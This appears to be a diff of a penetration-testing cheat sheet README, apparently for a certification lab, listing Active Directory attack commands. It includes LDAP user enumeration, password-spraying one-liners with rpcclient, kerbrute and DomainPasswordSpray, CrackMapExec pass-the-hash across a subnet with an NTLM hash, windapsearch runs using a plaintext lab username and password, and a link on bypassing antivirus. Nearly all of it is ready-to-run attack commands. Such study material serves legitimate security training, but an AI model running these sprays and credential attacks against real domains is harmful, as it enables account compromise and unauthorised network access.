haivan7/CPTS-cheatsheet/README.md

 # Uses ldapsearch to discover users in a target Windows doman, then filters the output using grep to show only the sAMAccountName from a Linux-based host.
 ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "

+# Bash one-liner used to perform a password spraying attack using rpcclient and a list of users (valid_users.txt) from a Linux-based host.
+It also filters out failed attempts to make the output cleaner.
+for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

 # Uses kerbrute and a list of users (valid_users.txt) to perform a password spraying attack against a target Windows domain from a Linux-based host.
 kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1

 # Uses CrackMapExec and the --local-auth flag to ensure only one login attempt is performed from a Linux-based host.
 This is to ensure accounts are not locked out by enforced password policies.
 It also filters out logon failures using grep.
 sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

-# Performs a password spraying attack and outputs (-OutFile) the results to a specified file (spray_success) from a Windows-based host.
+# Performs a password spraying attack and outputs (-OutFile) the results to a specified file (spray_success) from a Windows-based host.  (https://github.com/dafthack/DomainPasswordSpray)
+Import-Module .\DomainPasswordSpray.ps1
 Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

+# Uses the python tool windapsearch.py to discover users in a target Windows domain from a Linux-based host.  (https://github.com/ropnop/windapsearch)
+./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

+# Used to enumerate the domain admins group (--da) using a valid set of credentials on a target Windows domain.
+Performed from a Linux-based host.
+./windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

+# Used to perform a recursive search (-PU) for users with nested permissions using valid credentials.
+Performed from a Linux-based host.
+./windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

 ```
 ##### [Enumerating and Bypassing AV](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/defense-evasion/disable-defender)
 ```